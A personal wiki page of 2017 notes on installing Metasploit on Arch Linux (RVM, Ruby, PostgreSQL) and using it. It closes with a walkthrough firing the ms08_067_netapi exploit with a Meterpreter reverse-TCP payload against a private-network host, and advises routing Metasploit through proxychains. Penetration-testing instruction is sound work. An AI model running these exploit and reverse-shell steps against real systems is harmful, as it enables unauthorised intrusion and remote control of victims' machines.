[ Prev ] [ Index ] [ Next ]

Metasploit

Created Thursday 07 December 2017


# An exploit and information gathering infrastructure.
# Remember to run metasploit through proxychains.


Installation

$ pacman -S metasploit


RVM

# Metasploit is build with Ruby and to have it working we'll need the RVM (ruby version manager)
# command line tool which will allow us to install and manage multiple ruby environments
$ curl -L get.rvm.io > rvm-install
$ bash < ./rvm-install


# you might get a WARNING about --user-dirs (or something like that), just ignore it
# After installation, check that everything worked
$ type rvm | head -n1


# This should return something like this is a function along with a location in your home directory
# If not, try to log out/ back in. If that still didn't do the trick, perform the actions from a different
# tty - I had an issue getting it to show in my normal CLI, though steps has been taken to add in my
# dotfile/.zprofile, but in a different tty the type rvm | head -n1 gave me the correct output.


# Check for requirements
$ rvm requirements


# You will need to install the correct version of Ruby.
# Check https://github.com/rapid7/metasploit-framework/blob/master/.ruby-version
# which will give you the current version to use.


# You can get a list of known environments with;
$ rvm list known


# To instal 2.3.3 (i.e)
$ rvm install 2.3.3


# Then to set it as default
$ rvm use 2.3.3 --default


# Source the RVM installation
$ source ~/.rvm/scripts/rvm


# And install the necessary gems for Msfconsole
$ gem install bundler
$ bundle init
$ bundle install


PostgreSQL

# Metasploit also needs a database for our purpose and it will only work with PostgreSQL
$ pacman -S postgresql


# Set a password for the new PostgreSQL user (sudo)
$ passwd postgres


# Switch to the Postgres profile
$ sudo -u postgres -i


# Now, as a substitute user of Postgre, initialize the database cluster and exit
[postgres]$ initdb --locale $LANG -E UTF8 -D '/var/lib/postgres/data'
[postgres]$ exit


# Enable/start the postgresql server
$ systemctl enable postgresql.service


# Now switch back to the Postgres profile
$ sudo -u postgres -i


# And create a user (do so with your own user-name for convenience)
# This command will ask you to provide a user name and ask if it should be super user
# Once the profile is created (and linked to your profile) you can exit the user and use commands
# from your typical profile/cli
[postgres]$ createuser --interactive
[postgres]$ exit


# Create our msf database
$ createdb msf


Setting up the database

# Now that we have Ruby and PostgreSQL up and running, fire up msf so we can setup the db
$ msfconsole


# Setup the db according to the installation steps we did above - Change stick accordingly
msf > db_connect stick@msf
msf > db_rebuild_cache


# Check that it's connected to the db
msf > db_status



Usage

# You can discover many interesting things about a host with nmap - Things that might be required
# as parameters in metasploit, such as the operating system and software version.


# There are different module types in metasploit

auxiliary - various tasks, like scanning, detection and analysis scanning etc
exploit - What will take advantage of a vulnerability
payload - The thing that should be done right after a successful exploit
post - Various programs that can run after a successful exploit
encoder - Programs that provides encryption
nop - Does nothing and is useful for filling out voids in executables



Searching

# Once you have an OS of an host, you can search for exploits against that target
# Say we are looking at a Linux platform of Novell
msf > search platform:linux type:exploit name:Novel


# The following key-searchwords are as followed;

app: - Should be either client or server - For each their individual exploits
author: -Name and email of module author
type: - auxiliary, exploit, payload, post, encoder, nop
name: - Path name or a short description
platform: - The targets hardware or software platform


# They can also perform search for exploits from one of the 4 following exploit databases

bid: - (bugtraq) http://www.securityfocus.com/
cve: - https://www.cvedetails.com/
edb: - https://www.exploit-db.com/browse/
osvdb: - https://blog.osvdb.org/
ref: - Any of the above I think



Information about an Exploit

# You can get information and which options is required for an exploire
msf > info windows/manage/migrate


Using an Exploit

# Once you've found an exploit suitable, use it
msf > use exploit/windows/smb/ms08_067_netapi


# The ms08_067_netapi is a WinXP and WinServer 2003 SMB service exploit - great if no firewall.


# You can then get what options this exploit requires to do its magic
msf exploit(ms08_067_netapi) > show options


# All the fields with Required must be set
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102


# Now choose your Payload
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp


# The meterpreter payload will create a reverse TCP connection, allowing you to run commands
# on the targets system.


# Now that you have added a Payload, more options will become available
msf exploit(ms08_067_netapi) > show options


# Meterpreter requires LHOST (localhost) as a return address, where the exploited machine will
# send a connection request to.
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1


# Now run the attack and hope for the best.
msf exploit(ms08_067_netapi) > exploit



Backlinks: Home